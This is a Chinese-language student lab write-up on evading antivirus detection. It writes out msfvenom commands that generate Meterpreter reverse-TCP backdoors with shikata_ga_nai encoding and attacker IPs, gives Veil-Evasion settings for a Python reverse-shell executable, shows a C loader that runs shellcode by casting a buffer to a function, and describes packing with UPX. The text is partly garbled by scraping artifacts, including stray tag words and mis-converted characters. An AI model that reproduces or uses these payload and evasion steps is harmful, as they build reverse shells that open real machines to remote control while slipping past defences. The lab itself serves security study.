以前我命名的后面文件名称为"20155308_backdoor.exe",会产生如下提示:python
能够看出,报毒率挺高。若是在使用msf时对它多编码几回,观察报毒率的变化。(进行编码十次)shell
Msfvenom是Metasploit平台下用来编码payloads免杀的工具。windows
# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.20.136 LPORT=443 -f exe > met-encoded.exe
将生成的文件放到网站上扫描一下:
安全
能够发现不管编码多少次都是同样,因此想要利用编码次数来达到免杀效果显然是不行的。网络
Veil-Evasion是一个免杀平台,与Metasploit有点相似,在Kalil软件库中有,但默认没装。免杀效果比较好。tcp
use python/meterpreter/rev_tcp
设置payload。set LHOST 192.168.91.128
设置反弹链接IP(此IP为kali机的IP地址),输入命令set LPORT 5308设置反弹端口5308
。
generate
生成程序,并输入后门程序名称“hwf5308”hwf5308.exe
,路径为/var/lib/veil-evasion/output/compiled
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.130 LPORT=5308 -f c
20155308.c
,而后将unsigned char buf[]
赋值到其中,代码以下:unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" ...... "\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"; int main() { int (*func)() = (int(*)())buf; func(); }
压缩壳UPX工具
# upx met_raw.exe -o met_raw.upxed.exe Ultimate Packer for eXecutables Copyright (C) 1996 - 2013 UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013 File size Ratio Format Name -------------------- ------ ----------- ----------- 101678 -> 56110 55.18% win32/pe met.upxed.exe Packed 1 file. #
upx #须要加壳的文件名 -o #加壳后的文件名
此处为了方便实验,我将以前更名为“hwf.exe”文件改成“5308.exe”。学习
本次实验是了解恶意软件检测机制,经过这方面的漏洞进行文件的更改和后门的处理,用扫描软件进行扫描,以此来观察各类处理优缺点。经过实际的动手操做,验咱们也能够发现要想制做出免杀的病毒其实也并不难,可是最关键的仍是在于咱们要提升本身的安全意识。经过对后门文件各类方式的隐藏的学习,咱们应该反过来进行配置防火墙,监控端口等一些行为来保障咱们计算机的安全。网站